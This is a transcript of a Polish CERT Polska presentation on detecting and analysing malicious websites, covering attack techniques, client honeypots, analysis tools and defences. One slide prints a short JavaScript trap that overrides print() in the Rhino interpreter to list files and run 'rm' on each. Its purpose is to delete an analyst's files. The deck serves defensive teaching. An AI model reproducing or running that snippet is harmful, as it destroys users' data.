Wykrywanie i analiza złośliwych stron WWW. Łukasz Juszczyk CERT Polska/NASK lukasz.juszczyk@cert.pl



Podobne dokumenty
Techniki wykrywania złośliwych stron WWW

Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScript. OWASP Czerwiec The OWASP Foundation

Tytuł prezentacji. Wykrywanie cyberzagrożeń typu Drive-by Download WIEDZA I TECHNOLOGIA. Piotr Bisialski Security and Data Center Product Manager

Agenda. Quo vadis, security? Artur Maj, Prevenity

Honey Spider Network 2.0

Aspekty bezpieczeństwa aplikacji internetowych

Web Application Firewall - potrzeba, rozwiązania, kryteria ewaluacji.

Przepełnienie bufora. SQL Injection Załączenie zewnętrznego kodu XSS. Nabycie uprawnień innego użytkownika/klienta/administratora

4383: Tyle podatności wykryto w 2010 r. Przed iloma jesteś chroniony? 2010 IBM Corporation

Udostępnianie obrazu z kamer Sanyo HD na stronach WWW PORADNIK

Potwornie Dziurawy Format JavaScript a luki w PDF

Jak efektywnie wykrywać podatności bezpieczeństwa w aplikacjach? OWASP The OWASP Foundation

SQL z perspektywy hakera - czy Twoje dane są bezpieczne? Krzysztof Bińkowski MCT,CEI,CEH,ECSA,ECIH,CLFE,MCSA,MCSE..

Potwornie Dziurawy Format - JavaScript a luki w PDF Tomasz Grudziecki, Paweł Jacewicz NASK/CERT Polska, 2009

Client-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl

Malware przegląd zagrożeń i środków zaradczych

Wybrane działy Informatyki Stosowanej

Bezpieczeństwo systemów komputerowych. Java i JavaScript. Java i JavaScript. Java - historia

Typy przetwarzania. Przetwarzanie zcentralizowane. Przetwarzanie rozproszone

Realne zagrożenia i trendy na podstawie raportów CERT Polska. CERT Polska/NASK

Wybrane działy Informatyki Stosowanej

Wykład 3 / Wykład 4. Na podstawie CCNA Exploration Moduł 3 streszczenie Dr inż. Robert Banasiak

Network Forensic Co mówią złapane pakiety?

Agenda. Rys historyczny Mobilne systemy operacyjne

Kompleksowe zabezpieczenie współczesnej sieci. Adrian Dorobisz inżnier systemowy DAGMA

WSPÓŁCZESNE ZAGROŻENIA W SIECI INTERNET ORAZ SPOSOBY WALKI Z NIMI PRZY POMOCY SYSTEMÓW-PUŁAPEK

n6: otwarta wymiana danych

Aplikacje webowe z wykorzystaniem Node.js oraz Express

Marek Krauze

Zagrożenia związane z udostępnianiem aplikacji w sieci Internet

Architektura bezpiecznych aplikacji internetowych na platformie Java Enterprise Edition. Jakub Grabowski Warszawa,

KONFIGURACJA STACJI KLIENCKIEJ UMOŻLIWIAJĄCA KORZYSTANIE Z APLIKACJI ewniosek

Projektowanie i implementacja infrastruktury serwerów

OPIS PRZEDMIOTU ZAMÓWIENIA w odniesieniu do zadania antywirus - dostawa oprogramowania antywirusowego

Opis przedmiotu zamówienia w postępowaniu na usługę udostępniania/świadczenia poczty elektronicznej on-line (z aplikacją kalendarza).

OWASP OWASP. The OWASP Foundation Cross-Site Scripting. Ryzyko do zaakceptowania? Warszawa, 27 stycznia 2011 Michał Kurek

Usługa skanowania podatności infrastruktury IT Banków oraz aplikacji internetowych

Software Updater F-Secure Unikatowe narzędzie, które chroni firmy przed znanymi zagrożeniami

PROJEKT ARAKIS DOŚWIADCZENIA Z OBSERWACJI ZAGROŻEŃ W SIECI Tomasz Grudziecki (CERT Polska / NASK)

Kompresja stron internetowych

Badanie site-centric. wymagania

Bezpieczny e-urząd. Praktyczne wyjaśnienie techniki ataku APT z wykorzystaniem exploitoraz malware.

Wtyczki, dodatki, rozszerzenia

Zapewnienie dostępu do Chmury

Bezpieczeństwo aplikacji WWW. Klasyfikacja zgodna ze standardem OWASP. Zarządzanie podatnościami

Technologia Automatyczne zapobieganie exploitom

Bezpieczeństwo frameworków WEBowych Java na przykładzie ataku CSRF

Bezpieczeństwo mojej sieci O czym pomyśleć zanim będzie za późno Łukasz Bromirski lbromirski@cisco.com

OCHRONA PRZED RANSOMWARE. Konfiguracja ustawień

Automatyzacja Testowania w WEB 2.0

Szkolenie autoryzowane. MS Administracja i obsługa Windows 7. Strona szkolenia Terminy szkolenia Rejestracja na szkolenie Promocje

Nadzorowanie stanu serwerów i ich wykorzystania przez użytkowników

Wykrywanie i odpieranie ataków socjotechnicznych oraz cybernetycznych - jak zaatakować napastnika? Grzegorz Wróbel

Zastosowanie darmowych rozwiązań do testów użyteczności aplikacji internetowych

VMware View: Desktop Fast Track [v5.1] Dni: 5. Opis: Adresaci szkolenia

Czym jest AJAX. AJAX wprowadzenie. Obiekt XMLHttpRequest (XHR) Niezbędne narzędzia. Standardowy XHR. XHR z obsługą baz danych

Warszwa, Polska. Platforma do wymiany obrazów radiologicznych oraz telekonsultacji.

Patryk Jar Meet.js, Gdańsk 11 marca 2013 r. MODULARNY JAVASCRIPT

Urządzenia mobilne Nowe szanse, nowe zagrożenia FWZQJAEHEPQABIRQS

OCHRONA PRZED RANSOMWARE

Wyższy poziom bezpieczeństwa

Bezpieczeństwo w sieci - - działania NASK

Skuteczne rozpoznanie oraz kontrola aplikacji i użytkowników sieci - rozwiązanie Palo Alto Networks

Flex 3. Piotr Strzelczyk Wydział EAIiE Katedra Automatyki. Kraków, 2008

OpenLaszlo. OpenLaszlo

Firma Informatyczna ASDER. Prezentacja. Serwer danych lokalnych. Przemysław Kroczak ASDER

Wstęp do Microsoft Forefront. Jakub Januszewski Technology Adviser - Security Microsoft

Google Testing. Radosław Smilgin, , TestWarez

Rola i zadania polskiego CERTu wojskowego

Tomasz Grześ. Systemy zarządzania treścią

Najważniejsze trendy i zjawiska dotyczące zagrożeń teleinformatycznych w Polsce. Rafał Tarłowski CERT Polska/NASK

JavaFX. Technologie Biznesu Elektronicznego. Wydział Informatyki i Zarządzania Politechnika Wrocławska

Odpowiedzi na pytania do postępowania na zakupu oprogramowania antywirusowego (NR BFI 1S/01/10/05/2019) z dnia

Metody ochrony przed zaawansowanymi cyberatakami

Tworzenie stron internetowych z wykorzystaniem HTM5, JavaScript, CSS3 i jquery. Łukasz Bartczuk

Języki i narzędzia programowania III. Łukasz Kamiński Wykład II

IO - Plan wdrożenia. M.Jałmużna T.Jurkiewicz P.Kasprzyk M.Robak. 5 czerwca 2006

Analiza kampanii złośliwego Oprogramowania efaktura Orange. Win32/Injector.Autoit.BKD / Trojan.VBInject

Kancelaria Prawna.WEB - POMOC

Wprowadzenie do programowania www

KONFIGURACJA PRZEGLĄDAREK. Poniższa konfiguracja dedykowana jest dla Bankowości Internetowej SGB

Ataki na aplikacje WWW. Łomem, czy wytrychem? Jak dobrać się do aplikacji WWW

Egzamin : zabezpieczanie systemu Windows Server 2016 / Timothy Warner, Craig Zacker. Warszawa, Spis treści

TIN Techniki Internetowe zima

Programowanie MorphX Ax

Insider Threat Management - czyli jak skutecznie zapobiegać zagrożeniom wewnętrznym?

Podstawy programowania w języku JavaScript

Plan testów do Internetowego Serwisu Oferowania i Wyszukiwania Usług Transportowych

Linux -- u mnie działa!

Telnet. Telnet jest najstarszą i najbardziej elementarną usługą internetową.

Zabezpieczanie systemu Windows Server 2016

Bezpieczeństwo IT w środowisku uczelni

Wojciech Dworakowski. Zabezpieczanie aplikacji. Firewalle aplikacyjne - internetowych

Rys.2.1. Drzewo modelu DOM [1]

Agenda. Urządzenia mobilne w transakcjach elektronicznych. - szanse i zagrożenia. Artur Maj, Prevenity. Przegląd rynku urządzeń mobilnych

Podsumowanie. Uwaga. Przygotowanie

Wymagania dotyczące systemu ochrony anty wirusowej z zaporą ogniową dla stacji roboczych.

Metodologia ochrony informacji w systemach klasy desktop oraz na urządzeniach przenośnych

Transkrypt:

Wykrywanie i analiza złośliwych stron WWW Łukasz Juszczyk CERT Polska/NASK lukasz.juszczyk@cert.pl

Agenda atak analiza obrona techniki i mechanizmy ataków narzędzia, problemy sposoby obrony

Atak

Źródło ataków Strony internetowy tworzenie szkodliwych wykorzystanie legalnych

Techniki ataków JavaScript/VBScript/HTML Wtyczki do przeglądarki Flash Dokumenty PDF RealPlayer ActiveX, Java Fastflux

JavaScript/VBScript/HTML Tworzenie obiektów ActiveX Przekierowania Pobieranie malwaru z innych serwerów XMLHttpRequest Pływające ramki Przepełnienia bufora Zaciemnienie kodu

Animacje Flash Przekierowania Błędy w odtwarzaczu (flash player) Osadzony HTML i kod JavaScript

Dokumenty PDF Błędy w czytnikach interpreter języka Złożoność formatu Osadzony kod JavaScript Shellcode Kompresja, kodowanie, szyfrowanie

FastFlux Sieć skompromitowanych komputerów udostępniających publiczne rekordy DNS dla jednej domeny zwracane jest wiele adresów IP bardzo częste zmiany adresów dystrybucja nielegalnych treści

Analiza

Narzędzia do analizy Honeypoty klienckie HSN, Capture, SHELIA, PhoneyC, HoneyC,... Analiza ręczna Przeglądarka Narzędzia JavaScript, Flash, PDF

Honeypot System przygotowany na atak zbiera oraz analizuje informacje identyfikacja, zrozumienie oraz ochrona przed incydentami

Honeypot kliencki ataki na podatności klienta przeglądarka, wtyczki, OS wyszukuje złośliwe serwery nisko- oraz wysokointeraktywne

Honeypot kliencki analiza url 14

Honeypot niskointeraktywny Część aplikacji lub systemu Emulacja przeglądarki internetowej, web crawler Analiza statyczna sygnatury Szybki, łatwy we wdrożeniu i utrzymaniu Nie wykrywa złożonych ataków

Honeypot wysokointeratkywny Cały system rzeczywista przeglądarka internetowa Pozwala na przeprowadzenie całego ataku Wykrywa nieznane ataki Wolniejsze działanie, duże obciążenie systemu, złożona konfiguracja

Honeypot hybrydowy HoneySpider Network Centrum Moduł niskointeratkywny Moduł wysokointeraktywny

Analiza ręczna Przeglądarka internetowa naturalne środowisko <textarea> Firebug Interpreter JavaScript SpiderMonkey, Rhino tagi HTML, niepożądane funkcje document.write()! print()

Analiza - narzędzia Malzilla Malware hunting tool wepawet analiza Flash, JavaScript, PDF jsunpack wydobywa JavaScript z PDF, Flash Firebug dodatek do Firefoksa

Analiza - narzędzia pdftk Operacje na PDF-ach pdf-parser.py, pdfid.py Struktura PDF swftools Analiza Flasha flare, flasm Dekompilacja ActionScript Deasemblacja ActionScript

Trudności w analizie Zaciemniony kod JavaScript VBScript w JavaScript DOM przeglądarki Utrudnienia twórców Wykrywanie nieprzeglądarek Zamknięte standardy Wydajność narzędzi

Zaciemnianie kodu // Hello World x1 = unescape('%48%65%6c%6c%6f%20%57%6f%72%6c%64'); x2 = '\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64'; x3 = unescape('%48%65%6c' + '%6c%6f' + '%20%57%6f%72%6c%64'); x4 = unescape('%u0048%u0065%u006c%u006c%u006f%u0020%u0057%u006f%u0072%u006c%u0064'); x5 = unescape('%48%65%6c%6c%6f') + unescape('%u0020%u0057%u006f%u0072%u006c%u0064'); var p="%"; p+="u00"; var x6 = unescape( 'rtyui48rtyui65rtyui6crtyui6crtyui6frtyui20rtyui57rtyui6frtyui72rtyui6crtyui64'.replace(/rtyui/ig, p)); var _0xdead=["\x48\x62","\x66\x65\x62","\x24\x42", "\x62\x65\x65\x66"]; var _0xbeef=["\x48\x65\x6C\x6C\x6F","\x57\x6F\x72\x6C\x64","\x20","\x25\x75\x30\x30"]; var b=eval("_0x" + _0xdead['\x33']); x7 = b[0e0]+b[2e0]+b[unescape(b[0x0+3]+'31')]; // Hello fc=function(a){return String.fromCharCode(a);} l=(52/2,324/unescape('%u0033')); x8 = (4e1<0.4e1?.014e1:fc(72)+fc(10e1+1)+fc(57+51)+fc(l)+fc('1'+'1'+'1'));

Zaciemnianie kodu // Hello d = document; w = "write"; d[w]('hello'); // Hello World String.prototype.z = function(){!return this.split("").reverse().join("");} d[w](('dlrow\x20olleh').z()); // Kompresja (http://dean.edwards.name/packer/) eval(function(p,a,c,k,e,r){e=string;if(!''.replace(/^/,string)){while(c--)r [c]=k[c] c;k=[function(e){return r[e]}];e=function(){return'\\w +'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k [c]);return p}('2=0;0=3(1){4("=> 0 5: "+1+"\\6");2(1)}',7,7,'eval a old_eval function print arg n'.split(' '),0,{}))

Utrudnienia #1 DOM przeglądarki document, window, location Rozdzielczość ekranu, pozycja myszy Zaciemnianie zależne od kodu arguments.callee.tostring() Wykrywanie przeglądarek navigator.appname </textarea>

Utrudnienia #2 Referer Interpretery JavaScript Rhino function print (str) {! var opt = {input: "", output:""}! runcommand("ls", opt)! var tab = opt.output.split(new RegExp("\n","g"));! for (var i=0; i<tab.length-1;i++) {!! runcommand("rm", tab[i]);! } } Malzilla if (alert){}

Obrona

Sposoby obrony Aktualne oprogramowanie IE6 Wybór oprogramowania Flash, Java - potrzebne? NoScript Uprawnienia w SO Środowisko wirtualne

Podsumowanie Łączenie różnych technologii Coraz bardziej wyrafinowane techniki Wtyczki do przeglądarek Web 2.0

Demo

Dziękuję za uwagę Pytania?

http://cert.pl/ http://twitter.com/cert_polska